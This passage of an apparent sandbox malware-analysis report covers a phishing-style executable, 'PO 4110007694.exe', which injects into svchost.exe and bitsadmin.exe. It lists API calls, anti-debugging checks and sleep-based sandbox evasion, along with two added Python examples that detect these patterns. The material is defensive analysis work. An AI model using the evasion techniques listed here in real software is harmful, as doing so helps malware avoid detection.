                Source: Binary string: wntdll.pdb source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
Source: PO 4110007694.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PO 4110007694.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PO 4110007694.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PO 4110007694.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PO 4110007694.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C14B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C7848F push FFFFFF8Bh; iretd 0_2_00C78491
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C306FE push es; ret 0_2_00C3070B
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C3E70F push edi; ret 0_2_00C3E711
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C3070E push es; ret 0_2_00C3070F
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C30710 push es; ret 0_2_00C3071B
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C30720 push es; ret 0_2_00C30723
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C30724 push es; ret 0_2_00C30727
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C3072A push es; ret 0_2_00C30733
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C30734 push es; ret 0_2_00C30737
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C30739 push es; ret 0_2_00C30753
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C3E828 push esi; ret 0_2_00C3E82A
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C38945 push ecx; ret 0_2_00C38958
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C3EAEC push edi; ret 0_2_00C3EAEE
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C3EA03 push esi; ret 0_2_00C3EA05
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C32BDC push ds; ret 0_2_00C32BE2
Source: C:\Users\user\Desktop\PO 4110007694.exe | Code function: 0_2_00C253ED push edx; retn 0000h 0_2_00C253EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402055 push edx; iretd 1_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004018A1 push edx; iretd 1_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414930 push eax; retf 1_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181E4 push ds; retf 1_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040218B push ebp; iretd 1_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D9B6 push FFFFFFEBh; iretd 1_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041AA30 push edx; retf 1_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004192F1 push edx; ret 1_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00425433 push edi; ret 1_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403570 push eax; ret 1_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414658 push esp; ret 1_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414E8B pushfd ; iretd 1_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A7C3 push edi; ret 1_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D7CA push ecx; ret 1_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C148D7
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C95376
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C33187
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\PO 4110007694.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\PO 4110007694.exeAPI/Special instruction interceptor: Address: 17E1F04
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: PO 4110007694.exe, 00000000.00000002.1656484952.0000000001896000.00000004.00000020.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1646634074.0000000001896000.00000004.00000020.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1646534576.000000000182A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEA"O
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 9682
                Source: C:\Users\user\Desktop\PO 4110007694.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep count: 291 > 30
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep time: -582000s >= -30000s
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep count: 9682 > 30
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 6412Thread sleep time: -19364000s >= -30000s
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep count: 35 > 30
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep time: -52500s >= -30000s
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe TID: 2800Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
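                The "Thread sleep count" and "Thread sleep time" hits above are per-thread aggregates: the count of delay calls on one thread against a threshold of 30, and their summed duration against 30000. The figures for bitsadmin.exe TID 6412 (291 calls, -582000) divide to exactly 2000 per call, i.e. a Sleep(2000) polling loop rather than a single long stall. The following is an added example, not code from the Joe Sandbox report or from the analysed sample, that reproduces the aggregation over a constructed call trace. It assumes the tracer records NtDelayExecution's LARGE_INTEGER argument (negative = relative, 100 ns units) and that the report's totals are in milliseconds despite the "s" suffix; both are assumptions, not statements from the page.

```python
# Added example (not from the Joe Sandbox report): reproduce the per-thread
# sleep aggregation behind the "Thread sleep count / time" evasion hits.
from collections import defaultdict
from typing import Dict, Iterable, Optional, Tuple

SLEEP_COUNT_THRESHOLD = 30         # report wording: "sleep count: N > 30"
SLEEP_TOTAL_THRESHOLD_MS = 30_000  # report wording: "sleep time: -N >= -30000" (ms assumed)


def nt_interval_to_ms(interval: int) -> int:
    """NtDelayExecution takes a LARGE_INTEGER in 100 ns units. A negative value is a
    relative delay, so Sleep(2000) arrives as -20_000_000. Absolute (positive) times
    are deliberately rejected here rather than silently mis-converted."""
    if interval >= 0:
        raise ValueError("absolute (positive) delay intervals are not handled")
    return -interval // 10_000


def summarize_sleeps(events: Iterable[Tuple[int, int]]) -> Dict[int, dict]:
    """events: (tid, nt_interval) pairs as an API-hooking tracer would record them.
    Returns, per thread, the call count, summed delay, a fixed period if every delay
    was identical (a polling loop), and whether the report's thresholds are exceeded."""
    per_tid: Dict[int, list] = defaultdict(list)
    for tid, interval in events:
        per_tid[tid].append(nt_interval_to_ms(interval))

    summary: Dict[int, dict] = {}
    for tid, delays in per_tid.items():
        total = sum(delays)
        period: Optional[int] = delays[0] if len(set(delays)) == 1 else None
        summary[tid] = {
            "count": len(delays),
            "total_ms": total,
            "fixed_period_ms": period,
            "flagged": len(delays) > SLEEP_COUNT_THRESHOLD
            or total >= SLEEP_TOTAL_THRESHOLD_MS,
        }
    return summary


# Constructed trace (not captured from the sample): thread 6412 loops on Sleep(2000)
# 291 times, matching the count and total the report shows for bitsadmin.exe; a
# second thread sleeps twice for unrelated reasons and must stay below threshold.
TRACE = [(6412, -20_000_000)] * 291 + [(7001, -5_000_000), (7001, -10_000_000)]

if __name__ == "__main__":
    for tid, s in summarize_sleeps(TRACE).items():
        print(f"TID {tid}: count={s['count']} total={s['total_ms']}ms "
              f"period={s['fixed_period_ms']} flagged={s['flagged']}")
```

                A uniform period is the detail worth keeping when triaging: a legitimate console tool such as bitsadmin.exe has no reason to poll in a fixed 2 s loop for nearly ten thousand iterations, which, alongside the thread-injection signatures in the overview, is why the sleeping thread deserves attention rather than the sleep itself.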
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7EF95
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7F0F2
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7BCBC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 4_2_02B9C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02B9C640
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0
                Source: hLRGQqcplWvpUw.exe, 00000007.00000002.4114577228.00000000010FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                Source: bitsadmin.exe, 00000004.00000002.4113859069.0000000002EE2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2180800002.000002DA996CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417B23 LdrLoadDll,1_2_00417B23
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C83F09 BlockInput,0_2_00C83F09
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C45A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C45A7C
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
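                Several hits in this report are instruction-pattern matches rather than API calls: the rdtsc at 1_2_0367096E (timing-based debugger detection), the long run of "mov eax, dword ptr fs:[00000030h]" reads that follow (the TEB slot holding the PEB pointer, from which BeingDebugged and NtGlobalFlag are read), and the earlier "push X; ret / retf / iretd" sequences (control transfer through the stack, which defeats linear disassembly and return-address stack walks). The following is an added example, not code from the Joe Sandbox report or from the analysed sample, showing the byte encodings behind those hits as a linear scan over raw code bytes. It is not a disassembler: like the sandbox's own scan it will also fire on data or misaligned bytes, which is the likely explanation for the cluster of "push es; ret" hits only a few bytes apart at 0_2_00C3070E..0_2_00C30739. The sample bytes are constructed for the example.

```python
# Added example (not from the Joe Sandbox report): linear byte-pattern scan for
# the x86 encodings behind the report's rdtsc, fs:[30h] and push/ret signatures.
from typing import List, Tuple

PEB_DISP = bytes.fromhex("30000000")  # disp32 0x30 = TEB.ProcessEnvironmentBlock
# MOV r32, [disp32] is 8B /r with ModRM mod=00 rm=101; the reg field picks the target.
MOV_R32_DISP32 = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                  0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # 0x50+r = push r32
SEG_PUSH = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}
RET_LIKE = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def scan_evasion_opcodes(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Return (address, text) for every pattern found, using the report's own wording."""
    hits: List[Tuple[int, str]] = []
    i, n = 0, len(code)
    while i < n:
        b = code[i]
        nxt = code[i + 1] if i + 1 < n else None
        # rdtsc (0F 31) and cpuid (0F A2): timing and hypervisor-vendor checks
        if b == 0x0F and nxt in (0x31, 0xA2):
            hits.append((base + i, "rdtsc" if nxt == 0x31 else "cpuid"))
            i += 2
            continue
        # fs:[30h] reads: 0x64 FS override, then A1 moffs32 (eax only) or 8B /r [disp32]
        if b == 0x64 and nxt == 0xA1 and code[i + 2:i + 6] == PEB_DISP:
            hits.append((base + i, "mov eax, dword ptr fs:[30h]"))
            i += 6
            continue
        if (b == 0x64 and nxt == 0x8B and i + 2 < n
                and code[i + 2] in MOV_R32_DISP32 and code[i + 3:i + 7] == PEB_DISP):
            hits.append((base + i, f"mov {MOV_R32_DISP32[code[i + 2]]}, dword ptr fs:[30h]"))
            i += 7
            continue
        # push X followed by ret/retf/iretd: a jump disguised as a return
        if b == 0x6A and i + 2 < n and code[i + 2] in RET_LIKE:  # push imm8, sign-extended
            imm = code[i + 1] | (0xFFFFFF00 if code[i + 1] & 0x80 else 0)
            hits.append((base + i, f"push {imm:08X}h; {RET_LIKE[code[i + 2]]}"))
            i += 3
            continue
        if 0x50 <= b <= 0x57 and nxt in RET_LIKE:  # push r32
            hits.append((base + i, f"push {REG32[b - 0x50]}; {RET_LIKE[nxt]}"))
            i += 2
            continue
        if b in SEG_PUSH and nxt in RET_LIKE:  # push es/cs/ss/ds
            hits.append((base + i, f"push {SEG_PUSH[b]}; {RET_LIKE[nxt]}"))
            i += 2
            continue
        if b == 0x9C and nxt in RET_LIKE:  # pushfd
            hits.append((base + i, f"pushfd; {RET_LIKE[nxt]}"))
            i += 2
            continue
        i += 1
    return hits


# Constructed sample (not bytes from the analysed binary): a PEB.BeingDebugged check,
# a timing read, then the push/ret variants the report lists. The final plain ret
# must not be flagged.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]
    "8A4002"          # mov al, byte ptr [eax+2]      ; PEB.BeingDebugged
    "648B0D30000000"  # mov ecx, dword ptr fs:[30h]
    "0F31"            # rdtsc
    "6A8BCF"          # push FFFFFF8Bh; iretd
    "06C3"            # push es; ret
    "57C3"            # push edi; ret
    "9CCF"            # pushfd; iretd
    "C3"              # ret
)

if __name__ == "__main__":
    for addr, text in scan_evasion_opcodes(SAMPLE, base=0x00C78000):
        print(f"0_2_{addr:08X} {text}")
```

                Treat the output as leads, not verdicts: a fs:[30h] read is also how the CRT and every TLS-using library locate the PEB, and push/ret pairs occur in ordinary code, so the report's judgement rests on the whole set of signatures (DebugPort queries, IsDebuggerPresent, BlockInput, thread injection) rather than any single pattern.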
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E2170 mov eax, dword ptr fs:[00000030h]0_2_017E2170
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E21D0 mov eax, dword ptr fs:[00000030h]0_2_017E21D0
                Source: C:\Users\user\Desktop\PO 4110007694.exeCode function: 0_2_017E0B60 mov eax, dword ptr fs:[00000030h]0_2_017E0B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
